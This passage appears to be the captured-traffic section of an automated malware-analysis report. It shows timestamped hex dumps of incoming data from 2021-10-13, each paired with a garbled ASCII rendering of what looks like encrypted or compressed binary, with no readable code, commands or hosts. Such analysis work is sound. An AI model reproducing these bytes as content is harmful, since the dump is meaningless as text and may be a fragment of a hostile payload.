1e a5 e4 a4 3e bc 97 62 e7 00 ae e0 b8 1a 40 98 9d f2 2c fa f0 07 42 57 34 fb 63 37 52 7b 07 5b b8 3e cd d3 d8 d1 86 46 0f e8 8e 90 4f 2d
                                                                          Data Ascii: vLL0wEP{l0EP*rNBC)kAjol4U)($,34y&#p-oU9~C%*"()+B]ao48E[yfb@ss~@k7P?}Rksg:?fJA>b@,BW4c7R{[>FO-
                                                                          2021-10-13 14:18:11 UTC70INData Raw: 95 33 5a 7b d1 a5 33 55 70 e7 87 73 cb 67 dd 6f 21 66 b8 27 fc a5 4a a5 7d b8 1e da 0c 5d 04 18 28 ef e0 00 f3 79 89 6d eb 1c 88 c7 ed 61 ae 15 39 1f 32 90 4e fe 1d e4 5d 72 37 11 6f fe f9 92 89 a2 5b 19 1e 17 28 b4 0f 85 cf 40 eb 6e 71 52 be ab e2 c6 28 c7 fa 5f f6 f7 05 bc 94 2e ab a3 d9 61 25 5e cd 2b 51 09 a5 5f 38 64 c9 a1 89 79 4c 10 ea b4 4e 80 67 59 d9 65 b3 7e 06 02 87 cc bb 57 c1 c7 74 84 19 79 85 0c e5 b4 14 ea 8d 95 be 80 84 35 75 65 29 1f 41 d8 80 4c e7 fc fa f0 a3 44 6a 90 58 e8 8e 0a 01 82 53 8d c9 5f 84 33 cf c4 db 91 fb 94 55 b1 cc ba e7 4e e6 ef d0 12 d0 34 2a bc 9f 24 7c fc 88 a9 f0 e8 14 8e a4 30 f9 cc 2c f2 6c 7d 11 7f 62 6b f3 ff f5 32 d6 b9 ea 7b a6 6a 7a 32 fd ab dc b6 cb e9 91 6a 82 7c d3 03 6a 93 cc 3c 6f c0 d5 61 85 e0 ee 50 56
                                                                          Data Ascii: 3Z{3Upsgo!f'J}](yma92N]r7o[(@nqR(_.a%^+Q_8dyLNgYe~Wty5ue)ALDjXS_3UN4*$|0,l}bk2{jz2j|j<oaPV
                                                                          2021-10-13 14:18:11 UTC71INData Raw: 51 09 2f 37 16 87 2b 56 5a 9b b4 03 74 4e e9 e0 ef 4b 44 49 0a 48 7f 20 8c 32 3c 0e e2 e7 e8 6b 43 b6 7f bd af 25 ee 6c e2 7a b5 1d 6e f8 06 bb ff 14 04 5a 54 9a cd 31 fb 97 db ec 66 36 08 95 09 24 21 42 a9 cb dc b5 34 e4 d3 c9 e4 87 6c 24 37 8f ae 62 80 00 55 bd 55 36 ba 2c 7b fc 55 27 92 ed f8 ef 2a f1 21 d4 f3 f7 c6 3a e4 e5 0e 92 7d 19 51 2f 97 46 cb 43 68 41 25 c8 07 ff c8 70 73 75 67 83 4d d1 bc e9 9e 40 62 7b 61 a9 be 8a 26 b4 05 58 f0 fc da af d7 8f d8 d2 fa 62 ca a1 8b 95 f5 4c 1c 77 63 38 be 39 29 38 22 4b 18 60 0f a5 a9 81 d7 41 de ad 5e 12 7d 5f d6 eb 26 9c f2 c7 54 a6 83 75 70 0e 8b a9 b0 7c ae 26 e3 02 bc e5 ba 53 5e 23 8e e5 a4 bc 9c 5b 87 5a b4 2f 94 df be a7 23 df 9e 4f 95 8e 20 cb fc 50 50 f4 27 15 11 0a 21 79 0b e2 49 bf e0 39 b5 8b 65
                                                                          Data Ascii: Q/7+VZtNKDIH 2<kC%lznZT1f6$!B4l$7bUU6,{U'*!:}Q/FChA%psugM@b{a&XbLwc89)8"K`A^}_&Tup|&S^#[Z/#O PP'!yI9e
                                                                          2021-10-13 14:18:11 UTC72INData Raw: 2d e2 9c 31 ce f5 bf 36 5c 1f 87 11 3f ac e9 d8 4a 81 85 88 7c e5 62 70 d0 82 e2 a7 3d 42 08 34 be 21 7e 19 ee 4a 5e b1 17 78 97 03 6f 88 a4 3e ee e3 16 22 ad 00 a5 98 5a e8 68 5f c1 bc 83 c3 ee bf ce d2 76 85 0b 0e 85 62 41 56 a2 c8 6c 05 71 4e 2f 7a 1c 85 ca 34 5d 23 89 1e 7a 5d 1e 8d 60 d7 84 6d 30 32 e9 b4 74 0e 2b 10 dc af 79 4a 43 70 8e 0b 79 da 0b e5 b4 71 9b 8b 95 b4 ee 6d 20 61 47 82 37 c7 d6 a8 d6 cf 78 f4 e1 a1 44 e3 95 58 e8 ee ff 11 8a 4d ca ac 5a 84 3f d1 61 54 95 fb 93 69 2c dc 92 42 66 71 e6 c4 3c 79 cb 2b ba 83 c6 86 fd 88 a2 f2 f4 6f 58 06 30 f3 d1 de 7d 7e 6e 1f 54 4e 7b fb eb a3 55 d3 b9 e6 65 3a 69 15 32 fe bf c2 d9 e2 48 91 60 e7 d8 fa d5 63 80 cd 3b e5 ea f7 1f b8 f4 fa 4e 76 01 0d b8 fd bd 95 19 fc 0b 27 18 d2 b8 3c c5 73 98 ae a6
                                                                          Data Ascii: -16\?J|bp=B4!~J^xo>"Zh_vbAVlqN/z4]#z]`m02t+yJCpyqm aG7xDXMZ?aTi,Bfq<y+oX0}~nTN{Ue:i2H`c;Nv'<s
                                                                          2021-10-13 14:18:11 UTC73INData Raw: 5c 15 61 f5 22 8a 15 3f 2c 37 e7 e8 7a d7 bc 8f a3 94 0c 04 6b fa 65 42 90 7c f4 16 9b 35 1c 19 a4 c9 a7 ca 3f e5 92 a0 53 eb 26 04 87 29 93 29 5c 57 56 e1 b1 3a f8 d7 9d 36 0a 7d 32 38 a7 7d 73 88 1f de 52 5a 05 b4 35 23 76 46 a7 3a e2 e6 65 54 fb 3c cb e6 82 45 33 f9 e0 11 93 f8 2d 5d d1 97 79 d7 50 e8 e0 12 8a 10 29 45 c7 62 7b 71 8f 47 52 a0 f4 8e 5f 1b ef 6f a8 59 ab c4 ec 14 5c 7d eb dd a4 ce 69 53 9c e9 1b dc f3 11 15 e3 0f 18 59 9f 20 a1 22 a7 65 e1 43 74 1e 26 4d af 10 c9 82 d8 c1 21 12 4c b0 47 f4 36 5f f4 aa 2b a5 8d 7d 7d 00 a5 e9 a2 3f 4c 2f f2 04 b1 eb f4 13 49 60 1a ec b5 ba 91 6a 09 45 b9 30 a0 5e cc c9 88 4d 9e 13 1a 97 2e c5 fb 6f af 0a 26 39 86 13 38 05 24 e4 3a 38 fe 2c a0 90 61 ba 7d 03 1f 87 35 1f 0d 38 c3 4b e8 d2 83 bf d5 d0 91 28
                                                                          Data Ascii: \a"?,7zkeB|5?S&))\WV:6}28}sRZ5#vF:eT<E3-]yP)Eb{qGR_oY\}iSY "eCt&M!LG6_+}}?L/I`jE0^M.o&98$:8,a}58K(
                                                                          2021-10-13 14:18:11 UTC75INData Raw: 81 71 1f 72 59 c4 c6 69 8d be 43 31 32 96 7d 4f 10 e4 aa 5b a0 12 cf f8 8a 7f fb 18 51 76 e9 1d 37 a2 2f 16 b0 44 e1 62 5f f8 1b af e4 e8 97 7a fa 59 8f 78 12 be 9e 4b 5b ab b6 7c 2f 76 44 02 5d 27 2f df 3c 62 e7 91 1c 7a 46 11 b3 41 67 23 69 36 22 0b aa 76 0e 20 17 c4 ad 42 e2 7b ec 85 1f 51 11 04 f4 b9 fd 05 88 84 b0 80 63 36 75 65 32 39 d1 cf 8d 72 bc 79 fe f0 b4 62 fc 99 c2 fd fb e7 06 ed d5 e3 34 54 ac 9d c3 ec 55 bd 45 92 7d 32 db bf f0 63 59 dd d0 14 a9 f1 6c bd 95 4b f2 2a 89 a3 ec f3 7c 61 a2 24 db a7 f4 e1 78 79 98 40 45 6a f2 ec 84 dc d8 af f1 76 15 7f 1a 21 ef ba c6 d9 de fc 1c 4f ed cc d3 10 71 91 da 3b 7f 71 e6 0e ae c8 49 5a 5e a8 2b a9 e6 83 99 35 e3 10 1f 97 4c 90 2b ed 7c 93 7e b5 6a 71 b8 76 8f ea 63 05 6d ee 5e d5 4f 1b 1b 13 1f b6 c8
                                                                          Data Ascii: qrYiC12}O[Qv7/Db_zYxK[|/vD]'/<bzFAg#i6"v B{Qc6ue29ryb4TUE}2cYlK*|a$xy@Ejv!Oq;qIZ^+5L+|~jqvcm^O
                                                                          2021-10-13 14:18:11 UTC76INData Raw: ff 6b f0 67 ca 97 5a 79 0f bb e4 73 0f a5 55 bc ce fe f0 a5 f3 cf fa 22 33 a5 09 35 23 82 57 cc da bf 24 f3 c8 d6 aa 1b 73 2d 31 92 ae 7f 92 1f 42 42 4a 18 81 36 7b ea 5d 83 36 cc fe f9 eb f7 23 d4 5a d1 d9 33 e1 e0 36 23 77 06 5d d1 9f 77 27 40 ca f1 0a 1f 12 29 45 45 7e 75 6f 8f 45 30 b0 d6 83 44 5b 4b 7b a6 46 9d 22 c2 14 5c eb ec 93 28 d0 1e cf 92 e9 0d c3 b9 91 fa ec 3f 1f c5 a0 31 af 3e 90 36 7d 52 70 6f 1b b6 af 1a cd 71 d7 cd 3e 11 60 44 4a f4 3f dc fe 5a 35 83 9a 4b af 13 ab f6 b6 03 c3 2f fb 1c d3 fb d6 08 51 4c f7 e1 b5 b3 14 85 06 76 ba 2c b8 ca df c7 9d 2c 88 5d 86 8c 2b c0 f9 4f 4d 15 2d c7 1b 2e 38 c6 3b e3 49 b7 d7 38 a6 83 6f 68 76 2a 3a b0 3c 00 0b d5 c4 61 ec c2 b3 bd d5 da 53 e2 9b cd 75 78 2a ee 17 d4 f9 9b 9d 72 5e 5b 05 5f 90 bd 4c
                                                                          Data Ascii: kgZysU"35#W$s-1BBJ6{]6#Z36#w]w'@)EE~uoE0D[K{F"\(?1>6}Rpoq>`DJ?Z5K/QLv,,]+OM-.8;I8ohv*:<aSux*r^[_L
                                                                          2021-10-13 14:18:11 UTC77INData Raw: 4d 5e 13 43 fa 92 65 88 a5 47 88 e2 3a 2a a9 0c ad b7 5c 15 69 75 d2 91 a9 cf 0d bd bf 93 59 85 0f 2e 9e 9c 42 2b cb d9 6b 29 5c 4e 2f 51 1c bd d9 3c 4c cf 89 1e 7c 4c 16 88 5e 44 ab 76 36 23 73 4d 75 22 28 1c c3 bb 56 ff bd 71 a8 1d 46 0b 08 e2 aa 99 17 a0 97 9f ed 52 d7 77 14 4b 37 c7 d8 aa 68 cd 7b 83 9a a5 6c e9 be 58 ee fd e5 30 80 59 ca 34 5e 84 3f c7 ec 42 83 f0 b9 66 38 cf ad 1f 67 5d ee c8 1f a3 cf 3d 42 94 67 83 ea 83 a3 e1 f8 85 71 89 32 d8 d9 dd 02 7c 15 7e 47 45 6e d9 dd 89 ce aa d2 e0 73 b3 44 15 32 ff b8 e6 cf ca c3 91 60 ed 69 d2 03 71 96 c0 06 73 ed f0 08 47 e1 c2 58 46 a9 0d bf e1 6b 08 35 fe 16 04 81 d1 a0 c4 ec 50 9b 85 a2 41 92 bb 25 f7 ea 63 0b 6f f8 5d d6 38 03 0e 13 1b 9d db 9c b8 c7 2a 59 d7 1f da e9 1c 59 2c df 9b 88 b8 fb af 62
                                                                          Data Ascii: M^CeG:*\iuY.B+k)\N/Q<L|L^Dv6#sMu"(VqFRwK7h{lX0Y4^?Bf8g]=Bgq2|~GEnsD2`iqsGXFk5PA%co]8*YY,b
                                                                          2021-10-13 14:18:11 UTC79INData Raw: 9a c4 cf f0 2b 36 96 21 0b 2c 5c 51 b9 d6 bd 25 e9 b2 d4 d9 4a 72 2d 22 e8 ed 72 88 19 40 40 7c 58 ac 2a 7f 85 7f ab 25 f6 92 c2 44 f5 25 d6 96 93 d8 22 f1 ee 26 bc 70 06 5b be be 68 d9 4b 89 a5 33 12 16 2b 2a 19 72 75 60 93 60 8e b4 fa 90 2f 5b 71 7e ac 2f de 0b ec 12 5e 8e b8 d2 be d7 1d e7 cc e2 00 c5 df a5 06 ed 19 68 42 02 31 a9 15 a6 31 4d 50 7a 28 06 b4 af 18 c9 1e d8 d9 35 30 77 59 40 e3 c8 c2 c9 a6 2c a4 92 74 f7 ef aa da ab 08 c5 2f f5 1c d3 fb d6 0e 6e 42 c5 0f b7 c1 76 7b 07 5e 9e 0d c9 c1 a0 bc 97 43 85 75 86 86 20 c9 c4 4d 44 22 26 39 1a 0a 36 16 30 f5 42 9e e4 2c a1 94 9b 65 45 24 2f bb 35 18 11 d5 c4 61 e6 ed b0 bf d2 c2 b2 ee ba cf 57 60 ff 0c 39 b9 81 b3 ae 73 74 7f 2f 68 e8 c1 4a c6 76 39 d2 b6 34 49 30 85 a8 0b f3 b3 37 e8 9e 3a 22 1a
                                                                          Data Ascii: +6!,\Q%Jr-"r@@|X*%D%"&p[hK3+*ru``/[q~/^hB11MPz(50wY@,t/nBv{^Cu MD"&960B,eE$/5aW`9st/hJv94I07:"
                                                                          2021-10-13 14:18:11 UTC80INData Raw: f2 f4 5f cf ae 8b 03 ee bf c4 66 5f 9a 1e 24 0e 9e 41 56 3e df 74 3b 69 5d b3 57 10 9a fb 99 64 cf 89 82 7c 53 0e b9 f8 4f 80 6d aa 22 7b aa 6b 77 b6 02 d7 a1 71 07 43 70 84 83 57 1f 13 fa fd fb 10 93 89 ab e0 e5 32 6a 72 3e 76 5b da 9f 54 d0 6d 62 f6 ba 73 cd 79 58 ee fd 6a 06 9d 79 fd 4f c2 82 26 e6 f3 47 09 fd 8d 5f 18 44 ba e1 66 ed ea cf 37 83 2d 2b bc 95 d7 87 e2 ac bc ad 7c 7d 6f 80 2f b5 47 f0 fe 58 71 18 db 43 75 d4 df 4a cd d7 b9 7c 75 a8 46 35 bc ff ab d6 51 cc f4 b8 40 13 cc d2 03 fc 86 d4 07 48 3b f7 1f b9 7c e8 45 75 82 ea b8 f7 95 95 1f e3 2d 10 a6 4a be 25 c0 63 ec 32 a6 75 5f a5 c2 9d f5 4c 2f ce da 5f d5 d9 69 11 23 00 fe 47 9a a7 e5 0c c7 d1 28 e8 c9 c0 c8 2c df 16 98 ac e3 ab 6d fb 87 04 a0 45 43 20 a0 de 9e 75 e5 85 4c c6 7f 24 21 a5
                                                                          Data Ascii: _f_$AV>t;i]Wd|SOm"{kwqCpW2jr>v[TmbsyXjyO&G_Df7-+|}o/GXqCuJ|uF5Q@H;|Eu-J%c2u_L/_i#G(,mEC uL$!
                                                                          2021-10-13 14:18:11 UTC81INData Raw: aa 1d 1c 09 26 87 a8 6c 84 0c 49 43 45 11 b6 27 87 eb 7b 80 34 fb fb e8 4d 6f 0b 6c fd d1 df 0a 4e e9 0e 85 63 2e 32 d0 96 6c f1 27 e7 f6 38 3a 7d 28 45 5d 1c 53 64 90 4e d1 bf e9 9d 40 62 78 69 58 41 a7 09 f4 07 57 e1 eb d8 a3 2f 1f e3 8b e1 13 ca ae 9e 0f ed 02 0c 0f fd 30 83 35 cb 00 7f 52 7c 13 01 af bc 1b c9 0f c2 d9 c0 1a 40 5a 50 e7 3d c3 f4 af 2b bd 6c 72 cd 13 80 f3 91 38 30 d0 0d 0d 07 fa e9 3c 40 40 a7 ec b5 ba a6 7b 07 4b a2 23 e0 f3 dd cf 80 bd 80 73 84 9e 2c da fc 57 ba 0b 0a 36 18 7c 90 16 21 e7 5f 9d 6d 2d a6 89 6e 7d 65 26 3f a6 cb 1e 2b 29 d2 41 e4 f2 a2 41 d4 f6 4e c4 94 e6 b1 4a 43 ef 3b c8 fa a9 a9 f9 e9 47 f7 04 80 bc 4a cc 58 13 d2 b6 27 6a 05 87 5d 23 f3 b3 9b e0 9e 2b 25 01 b8 a6 98 e7 97 76 1c a8 e3 b2 be a9 b7 87 03 4c b8 d6 71
                                                                          Data Ascii: &lICE'{4MolNc.2l'8:}(E]SdN@bxiXAW/05R|@ZP=+lr80<@@{K#s,W6|!_m-n}e&?+)AANJC;GJX'j]#+%vLq
                                                                          2021-10-13 14:18:11 UTC82INData Raw: f7 57 23 94 d1 c3 a2 fb c0 21 1b 56 8e 4c aa 39 c4 f0 38 0f 6b 9e a0 23 d7 36 b2 88 3c c4 6f db 96 65 3c ca 45 0b 21 e5 46 30 12 6c 5a 6f b2 35 d2 02 dc 4a 28 e2 4a 87 8b 31 5c 4c b2 89 33 72 44 d0 d1 ed 60 dd 4d 74 ca 69 33 8e 1c 01 22 e2 e7 e2 6c 78 a6 a9 92 81 2c f9 61 27 ca dc 81 72 e8 1d bc 9d a0 19 a4 5f bd d5 27 ef 9c d2 dc ea 39 0a f2 c0 35 29 56 44 d8 db a1 34 f2 d9 c6 c5 fa 72 2d 2e 94 a5 74 9a 14 6a 75 56 1a a3 45 b5 ea 57 a3 34 ec ea 2f 56 e5 32 c4 e8 c3 eb fe 84 51 0e 83 7f 0b 4b d6 f9 5d db 41 ec e1 e8 01 03 3a 49 63 9c 75 66 90 4f df bd 95 a2 42 73 79 56 1b 44 8b 0c fa 3c 72 e1 fa d9 a8 e2 15 c6 a5 59 04 c3 b6 e2 c8 ed 13 0d 12 12 3d c0 0b ba 22 77 7a c5 04 06 b2 b9 38 e7 1e c9 c5 28 28 67 50 6f 34 32 c3 e3 cb f8 af 92 79 e6 00 a7 99 9d 1d
                                                                          Data Ascii: W#!VL98k#6<oe<E!F0lZo5J(J1\L3rD`Mti3"lx,a'r_'95)VD4r-.tjuVEW4/V2QK]A:IcufOBsyVD<rY="wz8((gPo42y
                                                                          2021-10-13 14:18:11 UTC83INData Raw: 37 98 27 9a 73 4d d8 31 e5 c0 d9 7d 67 08 9a e7 b7 24 4f f6 e5 d4 fe b7 3c 4f 12 62 f0 56 e4 23 43 4c 72 76 d4 8f df 90 70 e1 f0 01 7d 56 de 19 d1 67 b1 37 0a 8c 19 b8 7e bd 28 8c 04 56 29 19 b8 ee 9b c0 80 85 8c e3 56 64 af f7 5a 7d 8c 26 49 1b 3b 80 98 7e 35 e6 4c 57 a0 1b 73 06 8b 42 8a 89 53 5d 67 11 3f 68 0c aa b8 75 38 6b 47 06 90 ab f7 de b9 c4 57 58 85 0b b7 bc 9e 50 40 b1 d0 53 f2 76 4e 2f 51 1e 84 c3 c2 65 e3 83 1a 6d 9a e8 92 4a 4f 99 7e 3f 24 75 ba 6f f0 2b 28 cd ad 5b f5 50 79 84 0e 58 19 f6 e4 9e 6c 08 01 be b4 ef 78 27 70 75 32 3e c7 cd 89 5d 31 79 d2 f3 bd 7f e4 94 49 e7 e1 08 01 ae 75 f3 30 48 08 06 c7 ec 52 83 d3 a9 7f 38 c2 ab e5 79 78 60 ef 14 a3 c9 3d 94 a9 49 81 f7 a0 9e e4 e0 71 58 1d 30 f3 d1 da f8 63 7d 1c 47 54 63 ee 01 8a e1 d1
                                                                          Data Ascii: 7'sM1}g$O<ObV#CLrvp}Vg7~(V)VdZ}&I;~5LWsBS]g?hu8kGWXP@SvN/QemJO~?$uo+([PyXlx'pu2>]1yIu0HR8yx`=IqX0c}GTc
                                                                          2021-10-13 14:18:11 UTC84INData Raw: 29 7a ba 2b 3b f2 29 b6 46 3e e8 8d e1 6c 66 93 ca 5a 3a 30 94 d5 21 1d 79 43 b9 9d 19 c1 0a cc e0 67 60 35 14 8d bd 69 5a 9a a6 20 7a 51 d6 f1 e0 4b c3 46 15 4a 97 32 a8 27 2f 80 a4 e7 e8 7b 5a ab 87 30 c5 2c ff 6a d2 d6 de 81 78 c3 3d ba ee 16 0e 28 6a b6 c4 21 d4 be c5 cf f0 00 5e 9f 09 3f 23 43 43 d9 ff bf 34 ec d7 fe 54 1a 5f 0c 26 fc 66 73 88 1b 31 7c 56 1a a3 32 13 99 17 ab 25 f6 d5 ba 47 f5 29 c2 b9 7d df 22 f7 f2 27 90 7a 06 4c de 89 5b 27 40 ca a6 30 69 d9 29 45 5f 7b 64 62 46 c7 e5 b1 fa 94 68 67 72 7e ac 42 f0 cc ec 14 58 e7 89 ec bc d1 14 de 88 94 40 c1 b0 87 2c ac 11 07 1f 0a 27 39 4c f8 20 7d 58 52 41 04 b4 a5 38 8b 1c c9 c5 37 0c fa ee 28 e1 37 c3 ef d9 e7 af 92 77 fe 23 b8 f9 a9 0e c1 30 f8 fa 2c d6 f0 1a 42 53 e3 ff b1 a5 06 68 08 5a a5
                                                                          Data Ascii: )z+;)F>lfZ:0!yCg`5iZ zQKFJ2'/{Z0,jx=(j!^?#CC4T_&fs1|V2%G)}"'zL['@0i)E_{dbFhgr~BX@,'9L }XRA87(7w#0,BShZ
                                                                          2021-10-13 14:18:11 UTC86INData Raw: 7f f3 42 49 f6 65 49 38 74 80 84 ed 3b b9 52 73 68 d8 8d b5 59 6f d9 0a 8e e6 6e ef 6c 20 98 47 32 cd 9e 3a a1 6c b1 29 74 f6 5c 2e 60 bd 97 29 06 80 81 80 7c e5 a5 fa ed ed 6b a4 15 03 1a 32 9c 64 04 df e4 5b 5e a6 61 50 fa 8a 64 99 a7 22 36 e1 16 22 96 46 af b0 4e e2 7e cf a3 fa a9 e4 e4 97 85 f8 59 8f 23 46 be 9e 4b 5f b5 4f dc 42 63 4f 2f 5b 72 5e db 3c 60 d0 a6 0d 75 4c 07 96 57 04 7e 6c 1a 29 75 bf 65 00 14 73 36 44 ae f6 0f 63 8b 1f 40 0f 17 c2 4c 66 3a 85 ad ae ee 79 34 6a 47 32 38 c7 cd 8f 5d 31 79 d2 f3 bd 7f e2 94 49 e1 e2 be fe 83 75 eb 0c bf 7c c6 38 f3 1a 86 f4 92 6c 37 d7 fe 1f 67 5d ea fb ad bc 8d 38 b3 95 5a 8e e2 a8 5d e7 cc 5a 79 b4 39 fa ca ff 77 61 62 7f 9d 29 49 f3 ff 8b cd d7 b9 e0 33 ec 46 84 32 ff a1 6f 52 d5 ca 82 6f ed dd dd 19
                                                                          Data Ascii: BIeI8t;RshYonl G2:l)t\.`)|k2d[^aPd"6"FN~Y#FK_OBcO/[r^<`uLW~l)ues6Dc@Lf:y4jG28]1yIu|8l7g]8Z]Zy9wab)I3F2oRo
                                                                          2021-10-13 14:18:11 UTC87INData Raw: 2c 8d 2b 31 3e 65 5b 54 93 35 c3 07 d5 29 f6 e0 18 16 a0 34 6e cf 69 58 cc 58 55 f6 e5 ef 3a d5 49 0a ef 69 33 95 08 52 ca e2 e7 ec 79 cf 3c 9e b1 c3 68 f9 6b fa 67 dd f2 4d e9 0e b1 f7 76 6a e4 57 b6 ce 08 bd 8f c4 c5 d2 6a 19 9d 03 2d 46 d8 56 ca f6 cc 1a e1 c8 dc d4 5d 71 2d 2e af e9 71 88 15 ce a3 54 1a a8 26 6f e7 55 d2 ee fc fd fd 69 b0 21 af 32 d1 d9 26 79 5a 03 81 77 7d 96 d1 96 6e ad c0 e6 f6 33 10 6b e2 45 5b 77 fb d1 1c 77 ce b1 fb 9e 68 40 72 7e ac 68 d1 0a ec 1e 4b 37 77 f9 be d1 1c e7 c5 e5 00 c9 c4 ae 04 ed 08 7a de 03 31 ab 14 ab 20 75 7a 20 00 06 be b8 c6 44 34 c9 cf 3c 66 a7 59 47 f0 20 cb cd fe 34 af 98 60 f0 02 ad ce 38 1a ce 2f f0 07 5e c5 f8 0c 4f 5e 84 9f f5 b8 0d 71 2f 1b b6 2f c1 d3 db df 4f 30 c5 5d 86 8c 08 9b f6 4f 4e 22 64 3b
                                                                          Data Ascii: ,+1>e[T5)4niXXU:Ii3Ry<hkgMvjWj-FV]q-.qT&oUi!2&yZw}n3kE[wwh@r~hK7wz1 uz D4<fYG 4`8/^O^q//O0]ON"d;
                                                                          2021-10-13 14:18:11 UTC88INData Raw: a6 2d b8 e1 f4 8b b9 58 d5 00 d6 7e d2 5e b4 8f 35 ab 55 fd 34 5a 02 4b 42 3d be ec e0 04 fb 4e 88 6d e5 7a 64 c0 3b e4 8c 3d 44 19 49 46 66 7f 1d f5 56 72 9e 10 6f f2 88 15 4e a2 51 72 e4 65 17 bc 07 a7 a1 4c 98 28 5b d0 b0 83 a5 ec bf ce eb 5d f6 4f 06 bc 94 69 17 a0 d9 61 05 34 4c 2f 5b 1e 88 ca 31 eb e6 89 1e 78 37 db 99 48 4b 37 02 23 25 64 b9 d6 36 85 04 c8 bb 53 92 88 70 84 1b 58 11 0e 33 3d 4d 16 8c 97 cf 3f 79 34 71 7e 2c 1f 80 dd 80 40 cd 03 38 f0 a5 68 ea e7 67 ec fd fc 11 8a 2a a2 36 5e 8e 11 86 ee 53 9f ea 96 0e 7c ca ba eb 4e 30 ee d0 1e 8b 8a 29 bc 9f 5a 84 ec 85 2c cf e0 7b 72 de fd f3 db f2 56 11 7b 14 47 4f c8 d8 ab 89 b6 1c b9 e0 77 be 7f 13 e4 70 81 d6 cd c8 90 41 60 ed c8 c3 0e 62 87 b8 12 6a ed fd 0e b1 93 ae 58 5e a8 25 f9 f5 95 03
                                                                          Data Ascii: -X~^5U4ZKB=Nmzd;=DIFfVroNQreL([]Oia4L/[1x7HK7#%d6SpX3=M?y4q~,@8hg*6^S|N0)Z,{rV{GOwpA`bjX^%
                                                                          2021-10-13 14:18:11 UTC89INData Raw: 38 41 c0 b2 b6 33 72 44 d5 e7 c7 5a d2 49 00 fb 6f 22 80 90 3d 24 2f e3 e8 7c 5c 20 86 bc 83 2d ec 61 eb 6f c8 a9 bc ef 0e bd 4c 0d 13 b0 41 a2 ec 83 fc 8d ce d9 76 17 1b 9d 08 23 01 ad 56 ca fa 93 27 c8 8d d4 a8 60 bf 2d 24 83 da f2 88 1f 43 52 50 0d 7f a7 6c ea 57 a8 0d b4 ff f9 4f 81 02 d4 f9 ca a4 ee f7 ed 0a 81 0e ca 5d d1 92 7b dd 47 f7 f2 a8 3a 8c 29 45 51 d1 64 62 87 9e dd b5 eb 92 51 7b 4d 33 58 bf 74 08 ee 6f 95 e1 fa d7 b9 5e 35 cf 8d e5 7b 16 b0 8d 00 fa 79 dd 17 78 f6 af 3f bc 4c a5 e8 15 86 07 b4 a9 3a da 2e cb cf 14 1b 6c 59 41 f4 36 d2 f3 af 1f b4 92 74 f6 ef aa da ab 07 c5 2f f5 12 d3 fb d6 0e 52 4b ee eb ad 44 0c 57 05 71 b6 04 28 c0 a6 0c 97 43 85 d1 31 ac 20 da e7 7f 47 0a 53 39 1a 02 3e 16 21 f2 5f be d4 77 a6 84 7c 9a 68 0a 33 a4 1f
                                                                          Data Ascii: 8A3rDZIo"=$/|\ -aoLAv#V'`-$CRPlWO]{G:)EQdbQ{M3Xto^5{yx?L:.lYA6t/RKDWq(C1 GS9>!_w|h3
                                                                          2021-10-13 14:18:11 UTC91INData Raw: be 30 49 01 7d 03 31 bf ec 6d 2d 80 85 89 7e ec 53 74 c7 ed 6b 2b 16 44 1b 33 85 61 6e 12 cc e4 58 a0 14 79 ee 99 7d 9a b1 40 7b c3 16 29 be 07 be a4 56 ff 40 cf d1 ba ad f7 e7 ae cf d2 88 81 0b 02 aa 88 52 42 b0 cd 7a 2a 56 4e 2e 51 0f 9e c8 2e 77 e7 1f 1f 7a 4a 05 90 3b 6d 82 6d 30 37 6c a2 7c 1f 26 6b e0 b9 51 ef 55 63 81 09 40 0d 86 52 a5 bd 05 99 86 ba c4 6d 25 78 7e 2f a6 d1 f2 92 5b ca 6f 28 e3 a0 7d e3 83 8e fd f3 e7 0e 93 4c d3 d2 4f 89 4d 46 ec 53 94 ea 97 6a e2 df 6c 6c 4d 71 ec d1 3c eb ca 2b b6 e1 59 81 fd 93 b0 eb f1 73 58 e2 31 f3 d1 e7 ec 11 78 14 47 4f 05 d7 fd 8b cb c1 aa e5 67 a4 68 03 23 f8 25 61 da 10 f8 87 73 e2 e7 fb 12 67 91 c4 bc 7e c3 d0 0e bf f1 e9 4b 51 33 12 b7 96 bd e3 18 fc 0b 27 55 d7 b8 30 c5 58 99 ae aa 79 77 a8 51 8c 3c
                                                                          Data Ascii: 0I}1m-~Stk+D3anXy}@{)V@RBz*VN.Q.wzJ;mm07l|&kQUc@Rm%x~/[o(}LOMFSjllMq<+YsX1xGOgh#%asg~KQ3'U0XywQ<
                                                                          2021-10-13 14:18:11 UTC92INData Raw: 79 7f 0e e2 ed 92 73 5c 77 96 6a 0e 07 ff 6b fb 76 db 82 76 fa 0b aa eb 92 ae b6 56 a0 ec 49 fc 8d c2 dc fe 39 1f 8b f7 36 22 5b 7b dd d8 6c 21 e3 ce c7 ae 97 08 2d 24 86 86 68 89 1f 48 30 02 18 a9 20 03 fb 52 83 25 fc fd ea 75 f0 23 6a f8 d1 d9 e2 f7 ed 1f 95 66 0c 65 7e 97 6a d9 41 f7 fc 2d 00 ee 28 69 50 62 70 5c e7 49 ce b1 e5 85 53 79 73 6f ac 5f 85 f4 ed 38 5b e2 e9 da a1 de 0d c5 8d f6 0a dc bb 73 05 c1 1f 16 13 12 36 21 88 8a 64 62 5e 69 0a 06 a5 a5 0b 37 1f e5 ca 15 f1 70 4a 4d f4 27 c9 f2 5a 35 83 91 6b f2 1b ab e7 a3 06 30 2e de 02 2e e9 fd 16 56 4a ee fd bf a5 04 85 06 76 bf 28 da c6 53 70 41 48 9e 55 95 8c 20 cb fe 53 ba 0b 0a 33 0b 05 27 10 bb f0 4d a8 ec 26 a6 92 6f 7b 7a d8 36 9c 33 34 4b 34 d1 5e ee fa aa b5 ca d0 b2 ee ba c7 6d 64 c3 39
                                                                          Data Ascii: ys\wjkvvVI96"[{l!-$hH0 R%u#jfe~jA-(iPbp\ISyso_8[s6!db^i7pJM'Z5k0..VJv(SpAHU S3'M&o{z634K4^md9
